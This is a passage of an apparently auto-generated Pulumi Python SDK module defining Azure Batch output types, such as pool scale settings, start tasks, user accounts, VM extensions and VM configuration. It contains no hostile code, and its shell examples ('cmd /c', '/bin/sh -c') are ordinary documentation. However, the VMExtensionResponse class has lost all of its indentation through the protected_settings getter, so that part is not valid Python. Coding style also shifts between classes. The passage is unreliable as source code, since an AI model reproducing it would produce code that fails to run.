    @pulumi.getter(name="autoStorageContainerName")
    def auto_storage_container_name(self) -> Optional[str]:
        """
        The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified.
        """
        return pulumi.get(self, "auto_storage_container_name")

    @property
    @pulumi.getter(name="blobPrefix")
    def blob_prefix(self) -> Optional[str]:
        """
        The property is valid only when autoStorageContainerName or storageContainerUrl is used. This prefix can be a partial filename or a subdirectory. If a prefix is not specified, all the files in the container will be downloaded.
        """
        return pulumi.get(self, "blob_prefix")

    @property
    @pulumi.getter(name="fileMode")
    def file_mode(self) -> Optional[str]:
        """
        This property applies only to files being downloaded to Linux compute nodes. It will be ignored if it is specified for a resourceFile which will be downloaded to a Windows node. If this property is not specified for a Linux node, then a default value of 0770 is applied to the file.
        """
        return pulumi.get(self, "file_mode")

    @property
    @pulumi.getter(name="filePath")
    def file_path(self) -> Optional[str]:
        """
        If the httpUrl property is specified, the filePath is required and describes the path which the file will be downloaded to, including the filename. Otherwise, if the autoStorageContainerName or storageContainerUrl property is specified, filePath is optional and is the directory to download the files to. In the case where filePath is used as a directory, any directory structure already associated with the input data will be retained in full and appended to the specified filePath directory. The specified relative path cannot break out of the task's working directory (for example by using '..').
        """
        return pulumi.get(self, "file_path")

    @property
    @pulumi.getter(name="httpUrl")
    def http_url(self) -> Optional[str]:
        """
        The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. If the URL is Azure Blob Storage, it must be readable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read permissions on the blob, or set the ACL for the blob or its container to allow public access.
        """
        return pulumi.get(self, "http_url")

    @property
    @pulumi.getter(name="storageContainerUrl")
    def storage_container_url(self) -> Optional[str]:
        """
        The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. This URL must be readable and listable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read and list permissions on the blob, or set the ACL for the blob or its container to allow public access.
        """
        return pulumi.get(self, "storage_container_url")
@pulumi.output_type
class ScaleSettingsResponse(dict):
    """
    Defines the desired size of the pool. This can either be 'fixedScale' where the requested targetDedicatedNodes is specified, or 'autoScale' which defines a formula which is periodically reevaluated. If this property is not specified, the pool will have a fixed scale with 0 targetDedicatedNodes.
    """
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "autoScale": "auto_scale",
            "fixedScale": "fixed_scale",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in ScaleSettingsResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        ScaleSettingsResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        ScaleSettingsResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 auto_scale: Optional['outputs.AutoScaleSettingsResponse'] = None,
                 fixed_scale: Optional['outputs.FixedScaleSettingsResponse'] = None):
        """
        Defines the desired size of the pool. This can either be 'fixedScale' where the requested targetDedicatedNodes is specified, or 'autoScale' which defines a formula which is periodically reevaluated. If this property is not specified, the pool will have a fixed scale with 0 targetDedicatedNodes.
        :param 'AutoScaleSettingsResponse' auto_scale: This property and fixedScale are mutually exclusive and one of the properties must be specified.
        :param 'FixedScaleSettingsResponse' fixed_scale: This property and autoScale are mutually exclusive and one of the properties must be specified.
        """
        # Exactly one of the two settings is expected; store whichever was given.
        for prop_name, prop_value in (("auto_scale", auto_scale), ("fixed_scale", fixed_scale)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="autoScale")
    def auto_scale(self) -> Optional['outputs.AutoScaleSettingsResponse']:
        """
        This property and fixedScale are mutually exclusive and one of the properties must be specified.
        """
        return pulumi.get(self, "auto_scale")

    @property
    @pulumi.getter(name="fixedScale")
    def fixed_scale(self) -> Optional['outputs.FixedScaleSettingsResponse']:
        """
        This property and autoScale are mutually exclusive and one of the properties must be specified.
        """
        return pulumi.get(self, "fixed_scale")
@pulumi.output_type
class StartTaskResponse(dict):
    """
    In some cases the start task may be re-run even though the node was not rebooted. Due to this, start tasks should be idempotent and exit gracefully if the setup they're performing has already been done. Special care should be taken to avoid start tasks which create breakaway process or install/launch services from the start task working directory, as this will block Batch from being able to re-run the start task.
    """
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "commandLine": "command_line",
            "containerSettings": "container_settings",
            "environmentSettings": "environment_settings",
            "maxTaskRetryCount": "max_task_retry_count",
            "resourceFiles": "resource_files",
            "userIdentity": "user_identity",
            "waitForSuccess": "wait_for_success",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in StartTaskResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        StartTaskResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        StartTaskResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 command_line: Optional[str] = None,
                 container_settings: Optional['outputs.TaskContainerSettingsResponse'] = None,
                 environment_settings: Optional[Sequence['outputs.EnvironmentSettingResponse']] = None,
                 max_task_retry_count: Optional[int] = None,
                 resource_files: Optional[Sequence['outputs.ResourceFileResponse']] = None,
                 user_identity: Optional['outputs.UserIdentityResponse'] = None,
                 wait_for_success: Optional[bool] = None):
        """
        In some cases the start task may be re-run even though the node was not rebooted. Due to this, start tasks should be idempotent and exit gracefully if the setup they're performing has already been done. Special care should be taken to avoid start tasks which create breakaway process or install/launch services from the start task working directory, as this will block Batch from being able to re-run the start task.
        :param str command_line: The command line does not run under a shell, and therefore cannot take advantage of shell features such as environment variable expansion. If you want to take advantage of such features, you should invoke the shell in the command line, for example using "cmd /c MyCommand" in Windows or "/bin/sh -c MyCommand" in Linux. Required if any other properties of the startTask are specified.
        :param 'TaskContainerSettingsResponse' container_settings: When this is specified, all directories recursively below the AZ_BATCH_NODE_ROOT_DIR (the root of Azure Batch directories on the node) are mapped into the container, all task environment variables are mapped into the container, and the task command line is executed in the container.
        :param int max_task_retry_count: The Batch service retries a task if its exit code is nonzero. Note that this value specifically controls the number of retries. The Batch service will try the task once, and may then retry up to this limit. For example, if the maximum retry count is 3, Batch tries the task up to 4 times (one initial try and 3 retries). If the maximum retry count is 0, the Batch service does not retry the task. If the maximum retry count is -1, the Batch service retries the task without limit.
        :param 'UserIdentityResponse' user_identity: If omitted, the task runs as a non-administrative user unique to the task.
        :param bool wait_for_success: If true and the start task fails on a compute node, the Batch service retries the start task up to its maximum retry count (maxTaskRetryCount). If the task has still not completed successfully after all retries, then the Batch service marks the compute node unusable, and will not schedule tasks to it. This condition can be detected via the node state and scheduling error detail. If false, the Batch service will not wait for the start task to complete. In this case, other tasks can start executing on the compute node while the start task is still running; and even if the start task fails, new tasks will continue to be scheduled on the node. The default is true.
        """
        # Every constructor argument is optional; only the ones that were
        # actually supplied get stored on the output object.
        optional_props = (
            ("command_line", command_line),
            ("container_settings", container_settings),
            ("environment_settings", environment_settings),
            ("max_task_retry_count", max_task_retry_count),
            ("resource_files", resource_files),
            ("user_identity", user_identity),
            ("wait_for_success", wait_for_success),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="commandLine")
    def command_line(self) -> Optional[str]:
        """
        The command line does not run under a shell, and therefore cannot take advantage of shell features such as environment variable expansion. If you want to take advantage of such features, you should invoke the shell in the command line, for example using "cmd /c MyCommand" in Windows or "/bin/sh -c MyCommand" in Linux. Required if any other properties of the startTask are specified.
        """
        return pulumi.get(self, "command_line")

    @property
    @pulumi.getter(name="containerSettings")
    def container_settings(self) -> Optional['outputs.TaskContainerSettingsResponse']:
        """
        When this is specified, all directories recursively below the AZ_BATCH_NODE_ROOT_DIR (the root of Azure Batch directories on the node) are mapped into the container, all task environment variables are mapped into the container, and the task command line is executed in the container.
        """
        return pulumi.get(self, "container_settings")

    @property
    @pulumi.getter(name="environmentSettings")
    def environment_settings(self) -> Optional[Sequence['outputs.EnvironmentSettingResponse']]:
        return pulumi.get(self, "environment_settings")

    @property
    @pulumi.getter(name="maxTaskRetryCount")
    def max_task_retry_count(self) -> Optional[int]:
        """
        The Batch service retries a task if its exit code is nonzero. Note that this value specifically controls the number of retries. The Batch service will try the task once, and may then retry up to this limit. For example, if the maximum retry count is 3, Batch tries the task up to 4 times (one initial try and 3 retries). If the maximum retry count is 0, the Batch service does not retry the task. If the maximum retry count is -1, the Batch service retries the task without limit.
        """
        return pulumi.get(self, "max_task_retry_count")

    @property
    @pulumi.getter(name="resourceFiles")
    def resource_files(self) -> Optional[Sequence['outputs.ResourceFileResponse']]:
        return pulumi.get(self, "resource_files")

    @property
    @pulumi.getter(name="userIdentity")
    def user_identity(self) -> Optional['outputs.UserIdentityResponse']:
        """
        If omitted, the task runs as a non-administrative user unique to the task.
        """
        return pulumi.get(self, "user_identity")

    @property
    @pulumi.getter(name="waitForSuccess")
    def wait_for_success(self) -> Optional[bool]:
        """
        If true and the start task fails on a compute node, the Batch service retries the start task up to its maximum retry count (maxTaskRetryCount). If the task has still not completed successfully after all retries, then the Batch service marks the compute node unusable, and will not schedule tasks to it. This condition can be detected via the node state and scheduling error detail. If false, the Batch service will not wait for the start task to complete. In this case, other tasks can start executing on the compute node while the start task is still running; and even if the start task fails, new tasks will continue to be scheduled on the node. The default is true.
        """
        return pulumi.get(self, "wait_for_success")
@pulumi.output_type
class TaskContainerSettingsResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "imageName": "image_name",
            "containerRunOptions": "container_run_options",
            "workingDirectory": "working_directory",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in TaskContainerSettingsResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        TaskContainerSettingsResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        TaskContainerSettingsResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 image_name: str,
                 container_run_options: Optional[str] = None,
                 registry: Optional['outputs.ContainerRegistryResponse'] = None,
                 working_directory: Optional[str] = None):
        """
        :param str image_name: This is the full image reference, as would be specified to "docker pull". If no tag is provided as part of the image name, the tag ":latest" is used as a default.
        :param str container_run_options: These additional options are supplied as arguments to the "docker create" command, in addition to those controlled by the Batch Service.
        :param 'ContainerRegistryResponse' registry: This setting can be omitted if was already provided at pool creation.
        """
        # image_name is the only required property; the rest are stored
        # only when supplied.
        pulumi.set(__self__, "image_name", image_name)
        optional_props = (
            ("container_run_options", container_run_options),
            ("registry", registry),
            ("working_directory", working_directory),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="imageName")
    def image_name(self) -> str:
        """
        This is the full image reference, as would be specified to "docker pull". If no tag is provided as part of the image name, the tag ":latest" is used as a default.
        """
        return pulumi.get(self, "image_name")

    @property
    @pulumi.getter(name="containerRunOptions")
    def container_run_options(self) -> Optional[str]:
        """
        These additional options are supplied as arguments to the "docker create" command, in addition to those controlled by the Batch Service.
        """
        return pulumi.get(self, "container_run_options")

    @property
    @pulumi.getter
    def registry(self) -> Optional['outputs.ContainerRegistryResponse']:
        """
        This setting can be omitted if was already provided at pool creation.
        """
        return pulumi.get(self, "registry")

    @property
    @pulumi.getter(name="workingDirectory")
    def working_directory(self) -> Optional[str]:
        return pulumi.get(self, "working_directory")
@pulumi.output_type
class TaskSchedulingPolicyResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "nodeFillType": "node_fill_type",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in TaskSchedulingPolicyResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        TaskSchedulingPolicyResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        TaskSchedulingPolicyResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 node_fill_type: str):
        # The fill type is required and is always recorded.
        pulumi.set(__self__, "node_fill_type", node_fill_type)

    @property
    @pulumi.getter(name="nodeFillType")
    def node_fill_type(self) -> str:
        return pulumi.get(self, "node_fill_type")
@pulumi.output_type
class UserAccountResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "elevationLevel": "elevation_level",
            "linuxUserConfiguration": "linux_user_configuration",
            "windowsUserConfiguration": "windows_user_configuration",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in UserAccountResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        UserAccountResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        UserAccountResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 name: str,
                 password: str,
                 elevation_level: Optional[str] = None,
                 linux_user_configuration: Optional['outputs.LinuxUserConfigurationResponse'] = None,
                 windows_user_configuration: Optional['outputs.WindowsUserConfigurationResponse'] = None):
        """
        :param str elevation_level: nonAdmin - The auto user is a standard user without elevated access. admin - The auto user is a user with elevated access and operates with full Administrator permissions. The default value is nonAdmin.
        :param 'LinuxUserConfigurationResponse' linux_user_configuration: This property is ignored if specified on a Windows pool. If not specified, the user is created with the default options.
        :param 'WindowsUserConfigurationResponse' windows_user_configuration: This property can only be specified if the user is on a Windows pool. If not specified and on a Windows pool, the user is created with the default options.
        """
        # name and password are required; the remaining properties are
        # stored only when supplied.
        for prop_name, prop_value in (("name", name), ("password", password)):
            pulumi.set(__self__, prop_name, prop_value)
        optional_props = (
            ("elevation_level", elevation_level),
            ("linux_user_configuration", linux_user_configuration),
            ("windows_user_configuration", windows_user_configuration),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def name(self) -> str:
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def password(self) -> str:
        return pulumi.get(self, "password")

    @property
    @pulumi.getter(name="elevationLevel")
    def elevation_level(self) -> Optional[str]:
        """
        nonAdmin - The auto user is a standard user without elevated access. admin - The auto user is a user with elevated access and operates with full Administrator permissions. The default value is nonAdmin.
        """
        return pulumi.get(self, "elevation_level")

    @property
    @pulumi.getter(name="linuxUserConfiguration")
    def linux_user_configuration(self) -> Optional['outputs.LinuxUserConfigurationResponse']:
        """
        This property is ignored if specified on a Windows pool. If not specified, the user is created with the default options.
        """
        return pulumi.get(self, "linux_user_configuration")

    @property
    @pulumi.getter(name="windowsUserConfiguration")
    def windows_user_configuration(self) -> Optional['outputs.WindowsUserConfigurationResponse']:
        """
        This property can only be specified if the user is on a Windows pool. If not specified and on a Windows pool, the user is created with the default options.
        """
        return pulumi.get(self, "windows_user_configuration")
@pulumi.output_type
class UserIdentityResponse(dict):
    """
    Specify either the userName or autoUser property, but not both.
    """
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "autoUser": "auto_user",
            "userName": "user_name",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in UserIdentityResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        UserIdentityResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        UserIdentityResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 auto_user: Optional['outputs.AutoUserSpecificationResponse'] = None,
                 user_name: Optional[str] = None):
        """
        Specify either the userName or autoUser property, but not both.
        :param 'AutoUserSpecificationResponse' auto_user: The userName and autoUser properties are mutually exclusive; you must specify one but not both.
        :param str user_name: The userName and autoUser properties are mutually exclusive; you must specify one but not both.
        """
        # Exactly one of the two identities is expected; store whichever was given.
        for prop_name, prop_value in (("auto_user", auto_user), ("user_name", user_name)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="autoUser")
    def auto_user(self) -> Optional['outputs.AutoUserSpecificationResponse']:
        """
        The userName and autoUser properties are mutually exclusive; you must specify one but not both.
        """
        return pulumi.get(self, "auto_user")

    @property
    @pulumi.getter(name="userName")
    def user_name(self) -> Optional[str]:
        """
        The userName and autoUser properties are mutually exclusive; you must specify one but not both.
        """
        return pulumi.get(self, "user_name")
@pulumi.output_type
class VMExtensionResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "autoUpgradeMinorVersion":
suggest = "auto_upgrade_minor_version"
elif key == "protectedSettings":
suggest = "protected_settings"
elif key == "provisionAfterExtensions":
suggest = "provision_after_extensions"
elif key == "typeHandlerVersion":
suggest = "type_handler_version"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VMExtensionResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VMExtensionResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VMExtensionResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
publisher: str,
type: str,
auto_upgrade_minor_version: Optional[bool] = None,
protected_settings: Optional[Any] = None,
provision_after_extensions: Optional[Sequence[str]] = None,
settings: Optional[Any] = None,
type_handler_version: Optional[str] = None):
"""
:param bool auto_upgrade_minor_version: Indicates whether the extension should use a newer minor version if one is available at deployment time. Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property set to true.
:param Any protected_settings: The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at all.
:param Sequence[str] provision_after_extensions: Collection of extension names after which this extension needs to be provisioned.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "publisher", publisher)
pulumi.set(__self__, "type", type)
if auto_upgrade_minor_version is not None:
pulumi.set(__self__, "auto_upgrade_minor_version", auto_upgrade_minor_version)
if protected_settings is not None:
pulumi.set(__self__, "protected_settings", protected_settings)
if provision_after_extensions is not None:
pulumi.set(__self__, "provision_after_extensions", provision_after_extensions)
if settings is not None:
pulumi.set(__self__, "settings", settings)
if type_handler_version is not None:
pulumi.set(__self__, "type_handler_version", type_handler_version)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def publisher(self) -> str:
return pulumi.get(self, "publisher")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="autoUpgradeMinorVersion")
def auto_upgrade_minor_version(self) -> Optional[bool]:
"""
Indicates whether the extension should use a newer minor version if one is available at deployment time. Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property set to true.
"""
return pulumi.get(self, "auto_upgrade_minor_version")
@property
@pulumi.getter(name="protectedSettings")
def protected_settings(self) -> Optional[Any]:
"""
The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at all.
"""
return pulumi.get(self, "protected_settings")
    @property
    @pulumi.getter(name="provisionAfterExtensions")  # camelCase wire key -> snake_case property
    def provision_after_extensions(self) -> Optional[Sequence[str]]:
        """
        Collection of extension names after which this extension needs to be provisioned.
        """
        return pulumi.get(self, "provision_after_extensions")
    @property
    @pulumi.getter
    def settings(self) -> Optional[Any]:
        """Optional settings blob for the extension (stored only when provided)."""
        return pulumi.get(self, "settings")
    @property
    @pulumi.getter(name="typeHandlerVersion")  # camelCase wire key -> snake_case property
    def type_handler_version(self) -> Optional[str]:
        """Optional type handler version string (stored only when provided)."""
        return pulumi.get(self, "type_handler_version")
@pulumi.output_type
class VirtualMachineConfigurationResponse(dict):
    """Dict-backed output type describing the virtual machine configuration of a
    Batch pool. Values are stored under camelCase keys; snake_case access goes
    through the property getters below."""
    # Warn (once per access) when a raw camelCase key is used instead of the
    # corresponding snake_case property getter.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "imageReference":
            suggest = "image_reference"
        elif key == "nodeAgentSkuId":
            suggest = "node_agent_sku_id"
        elif key == "containerConfiguration":
            suggest = "container_configuration"
        elif key == "dataDisks":
            suggest = "data_disks"
        elif key == "diskEncryptionConfiguration":
            suggest = "disk_encryption_configuration"
        elif key == "licenseType":
            suggest = "license_type"
        elif key == "nodePlacementConfiguration":
            suggest = "node_placement_configuration"
        elif key == "windowsConfiguration":
            suggest = "windows_configuration"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in VirtualMachineConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
    # dict-style access still works, but emits the deprecation warning above.
    def __getitem__(self, key: str) -> Any:
        VirtualMachineConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        VirtualMachineConfigurationResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 image_reference: 'outputs.ImageReferenceResponse',
                 node_agent_sku_id: str,
                 container_configuration: Optional['outputs.ContainerConfigurationResponse'] = None,
                 data_disks: Optional[Sequence['outputs.DataDiskResponse']] = None,
                 disk_encryption_configuration: Optional['outputs.DiskEncryptionConfigurationResponse'] = None,
                 extensions: Optional[Sequence['outputs.VMExtensionResponse']] = None,
                 license_type: Optional[str] = None,
                 node_placement_configuration: Optional['outputs.NodePlacementConfigurationResponse'] = None,
                 windows_configuration: Optional['outputs.WindowsConfigurationResponse'] = None):
        """
        :param str node_agent_sku_id: The Batch node agent is a program that runs on each node in the pool, and provides the command-and-control interface between the node and the Batch service. There are different implementations of the node agent, known as SKUs, for different operating systems. You must specify a node agent SKU which matches the selected image reference. To get the list of supported node agent SKUs along with their list of verified image references, see the 'List supported node agent SKUs' operation.
        :param 'ContainerConfigurationResponse' container_configuration: If specified, setup is performed on each node in the pool to allow tasks to run in containers. All regular tasks and job manager tasks run on this pool must specify the containerSettings property, and all other tasks may specify it.
        :param Sequence['DataDiskResponse'] data_disks: This property must be specified if the compute nodes in the pool need to have empty data disks attached to them.
        :param 'DiskEncryptionConfigurationResponse' disk_encryption_configuration: If specified, encryption is performed on each node in the pool during node provisioning.
        :param Sequence['VMExtensionResponse'] extensions: If specified, the extensions mentioned in this configuration will be installed on each node.
        :param str license_type: This only applies to images that contain the Windows operating system, and should only be used when you hold valid on-premises licenses for the nodes which will be deployed. If omitted, no on-premises licensing discount is applied. Values are:
        Windows_Server - The on-premises license is for Windows Server.
        Windows_Client - The on-premises license is for Windows Client.
        :param 'NodePlacementConfigurationResponse' node_placement_configuration: This configuration will specify rules on how nodes in the pool will be physically allocated.
        :param 'WindowsConfigurationResponse' windows_configuration: This property must not be specified if the imageReference specifies a Linux OS image.
        """
        # Optional fields are only stored when supplied, so absent keys stay absent.
        pulumi.set(__self__, "image_reference", image_reference)
        pulumi.set(__self__, "node_agent_sku_id", node_agent_sku_id)
        if container_configuration is not None:
            pulumi.set(__self__, "container_configuration", container_configuration)
        if data_disks is not None:
            pulumi.set(__self__, "data_disks", data_disks)
        if disk_encryption_configuration is not None:
            pulumi.set(__self__, "disk_encryption_configuration", disk_encryption_configuration)
        if extensions is not None:
            pulumi.set(__self__, "extensions", extensions)
        if license_type is not None:
            pulumi.set(__self__, "license_type", license_type)
        if node_placement_configuration is not None:
            pulumi.set(__self__, "node_placement_configuration", node_placement_configuration)
        if windows_configuration is not None:
            pulumi.set(__self__, "windows_configuration", windows_configuration)
    @property
    @pulumi.getter(name="imageReference")
    def image_reference(self) -> 'outputs.ImageReferenceResponse':
        """The OS image reference for the pool's virtual machines (required)."""
        return pulumi.get(self, "image_reference")
    @property
    @pulumi.getter(name="nodeAgentSkuId")
    def node_agent_sku_id(self) -> str:
        """
        The Batch node agent is a program that runs on each node in the pool, and provides the command-and-control interface between the node and the Batch service. There are different implementations of the node agent, known as SKUs, for different operating systems. You must specify a node agent SKU which matches the selected image reference. To get the list of supported node agent SKUs along with their list of verified image references, see the 'List supported node agent SKUs' operation.
        """
        return pulumi.get(self, "node_agent_sku_id")
    @property
    @pulumi.getter(name="containerConfiguration")
    def container_configuration(self) -> Optional['outputs.ContainerConfigurationResponse']:
        """
        If specified, setup is performed on each node in the pool to allow tasks to run in containers. All regular tasks and job manager tasks run on this pool must specify the containerSettings property, and all other tasks may specify it.
        """
        return pulumi.get(self, "container_configuration")
    @property
    @pulumi.getter(name="dataDisks")
    def data_disks(self) -> Optional[Sequence['outputs.DataDiskResponse']]:
        """
        This property must be specified if the compute nodes in the pool need to have empty data disks attached to them.
        """
        return pulumi.get(self, "data_disks")
    @property
    @pulumi.getter(name="diskEncryptionConfiguration")
    def disk_encryption_configuration(self) -> Optional['outputs.DiskEncryptionConfigurationResponse']:
        """
        If specified, encryption is performed on each node in the pool during node provisioning.
        """
        return pulumi.get(self, "disk_encryption_configuration")
    @property
    @pulumi.getter
    def extensions(self) -> Optional[Sequence['outputs.VMExtensionResponse']]:
        """
        If specified, the extensions mentioned in this configuration will be installed on each node.
        """
        return pulumi.get(self, "extensions")
    @property
    @pulumi.getter(name="licenseType")
    def license_type(self) -> Optional[str]:
        """
        This only applies to images that contain the Windows operating system, and should only be used when you hold valid on-premises licenses for the nodes which will be deployed. If omitted, no on-premises licensing discount is applied. Values are:
        Windows_Server - The on-premises license is for Windows Server.
        Windows_Client - The on-premises license is for Windows Client.
        """
        return pulumi.get(self, "license_type")
    @property
    @pulumi.getter(name="nodePlacementConfiguration")
    def node_placement_configuration(self) -> Optional['outputs.NodePlacementConfigurationResponse']:
        """
        This configuration will specify rules on how nodes in the pool will be physically allocated.
        """
        return pulumi.get(self, "node_placement_configuration")
    @property
    @pulumi.getter(name="windowsConfiguration")
    def windows_configuration(self) -> Optional['outputs.WindowsConfigurationResponse']:
        """
        This property must not be specified if the imageReference specifies a Linux OS image.
        """
        return pulumi.get(self, "windows_configuration")
@pulumi.output_type
class VirtualMachineFamilyCoreQuotaResponse(dict):
    """
    A VM Family and its associated core quota for the Batch account.
    """
    # Warn when the raw camelCase key is used instead of the snake_case property.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "coreQuota":
            suggest = "core_quota"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in VirtualMachineFamilyCoreQuotaResponse. Access the value via the '{suggest}' property getter instead.")
    # dict-style access still works, but emits the warning above.
    def __getitem__(self, key: str) -> Any:
        VirtualMachineFamilyCoreQuotaResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        VirtualMachineFamilyCoreQuotaResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 core_quota: int,
                 name: str):
        """
        A VM Family and its associated core quota for the Batch account.
        :param int core_quota: The core quota for the VM family for the Batch account.
        :param str name: The Virtual Machine family name.
        """
        pulumi.set(__self__, "core_quota", core_quota)
        pulumi.set(__self__, "name", name)
    @property
    @pulumi.getter(name="coreQuota")
    def core_quota(self) -> int:
        """
        The core quota for the VM family for the Batch account.
        """
        return pulumi.get(self, "core_quota")
    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The Virtual Machine family name.
        """
        return pulumi.get(self, "name")
@pulumi.output_type
class WindowsConfigurationResponse(dict):
    """Output type carrying the Windows-specific configuration
    (currently only the automatic-updates flag)."""
    # Warn when the raw camelCase key is used instead of the snake_case property.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "enableAutomaticUpdates":
            suggest = "enable_automatic_updates"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in WindowsConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
    # dict-style access still works, but emits the warning above.
    def __getitem__(self, key: str) -> Any:
        WindowsConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        WindowsConfigurationResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 enable_automatic_updates: Optional[bool] = None):
        """
        :param bool enable_automatic_updates: If omitted, the default value is true.
        """
        if enable_automatic_updates is not None:
            pulumi.set(__self__, "enable_automatic_updates", enable_automatic_updates)
    @property
    @pulumi.getter(name="enableAutomaticUpdates")
    def enable_automatic_updates(self) -> Optional[bool]:
        """
        If omitted, the default value is true.
        """
        return pulumi.get(self, "enable_automatic_updates")
@pulumi.output_type
class WindowsUserConfigurationResponse(dict):
    """Output type carrying Windows user-account settings
    (currently only the login mode)."""
    # Warn when the raw camelCase key is used instead of the snake_case property.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "loginMode":
            suggest = "login_mode"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in WindowsUserConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
    # dict-style access still works, but emits the warning above.
    def __getitem__(self, key: str) -> Any:
        WindowsUserConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        WindowsUserConfigurationResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 login_mode: Optional[str] = None):
        """
        :param str login_mode: Specifies login mode for the user. The default value for VirtualMachineConfiguration pools is interactive mode and for CloudServiceConfiguration pools is batch mode.
        """
        if login_mode is not None:
            pulumi.set(__self__, "login_mode", login_mode)
    @property
    @pulumi.getter(name="loginMode")
    def login_mode(self) -> Optional[str]:
        """
